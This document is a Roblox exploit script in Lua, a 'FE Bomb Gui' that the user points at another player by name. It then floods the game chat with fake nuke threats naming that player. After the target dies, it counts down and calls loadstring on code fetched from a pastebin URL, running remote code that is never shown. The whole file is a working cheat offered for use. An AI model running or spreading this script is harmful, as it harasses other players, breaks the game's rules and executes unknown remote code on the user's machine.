local lp = game:GetService("Players").LocalPlayer local function gplr(String) local Found = {} local strl = String:lower() for i, v in pairs(game:GetService("Players"):GetPlayers()) do if strl == "all" then table.insert(Found, v) elseif strl == "others" and v.Name ~= lp.Name then table.insert(Found, v) elseif strl == "me" and v.Name == lp.Name then table.insert(Found, v) elseif v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found, v) end end return Found end local function notif(str, dur) game:GetService("StarterGui"):SetCore("SendNotification", { Title = "bomb gui", Text = str, Icon = "rbxassetid://2005276185", Duration = dur or 3 }) end -- GUI creation local h = Instance.new("ScreenGui") local Main = Instance.new("ImageLabel") local Top = Instance.new("Frame") local Title = Instance.new("TextLabel") local TextBox = Instance.new("TextBox") local TextButton = Instance.new("TextButton") h.Name = "h" h.Parent = game:GetService("CoreGui") h.ResetOnSpawn = false Main.Name = "Main" Main.Parent = h Main.Active = true Main.Draggable = true Main.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Main.BorderSizePixel = 0 Main.Position = UDim2.new(0.174545452, 0, 0.459574461, 0) Main.Size = UDim2.new(0, 454, 0, 218) Main.Image = "" Top.Name = "Top" Top.Parent = Main Top.BackgroundColor3 = Color3.fromRGB(57, 57, 57) Top.BorderSizePixel = 0 Top.Size = UDim2.new(0, 454, 0, 44) Title.Name = "Title" Title.Parent = Top Title.BackgroundColor3 = Color3.fromRGB(49, 49, 49) Title.BorderSizePixel = 0 Title.Position = UDim2.new(0, 0, 0.295454562, 0) Title.Size = UDim2.new(0, 454, 0, 30) Title.Font = Enum.Font.SourceSans Title.Text = "FE Bomb Gui (edited Yeet Gui)" Title.TextColor3 = Color3.fromRGB(255, 255, 255) Title.TextScaled = true Title.TextSize = 14.000 Title.TextWrapped = true TextBox.Parent = Main TextBox.BackgroundColor3 = Color3.fromRGB(49, 49, 49) TextBox.BorderSizePixel = 0 TextBox.Position = UDim2.new(0.0704845786, 0, 0.270642221, 0) TextBox.Size = UDim2.new(0, 388, 0, 62) TextBox.Font = Enum.Font.SourceSans TextBox.PlaceholderText = "Who do I plant bomb on (can be shortened)" TextBox.Text = "" TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.TextScaled = true TextBox.TextSize = 14.000 TextBox.TextWrapped = true TextButton.Parent = Main TextButton.BackgroundColor3 = Color3.fromRGB(49, 49, 49) TextButton.BorderSizePixel = 0 TextButton.Position = UDim2.new(0.10352423, 0, 0.596330225, 0) TextButton.Size = UDim2.new(0, 359, 0, 50) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "Plant" TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton.TextScaled = true TextButton.TextSize = 14.000 TextButton.TextWrapped = true local function triggerNuke(targetPlayer) if targetPlayer then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("!!!A NUKE HAS BEEN PLACED ON "..targetPlayer.DisplayName.." KILLING THEM WILL GEG EVERYONE DEAD!!!", "ALL") repeat task.wait() until targetPlayer.Character and targetPlayer.Character:FindFirstChildOfClass("Humanoid") and targetPlayer.Character:FindFirstChildOfClass("Humanoid").Health < 1 game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(targetPlayer.DisplayName.." IS DEAD NUKE LAUNCHING!!!", "ALL") wait(1.5) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("LAUNCHING IN 3", "ALL") wait(1.5) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("LAUNCHING IN 2", "ALL") wait(1.5) game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("LAUNCHING IN 1", "ALL") wait(3) loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))() else warn("Player not found, did you use their username?") end end TextButton.MouseButton1Click:Connect(function() local Targets = gplr(TextBox.Text) if #Targets > 0 then local Target = Targets[1] triggerNuke(Target) else notif("Player not found", 3) end end)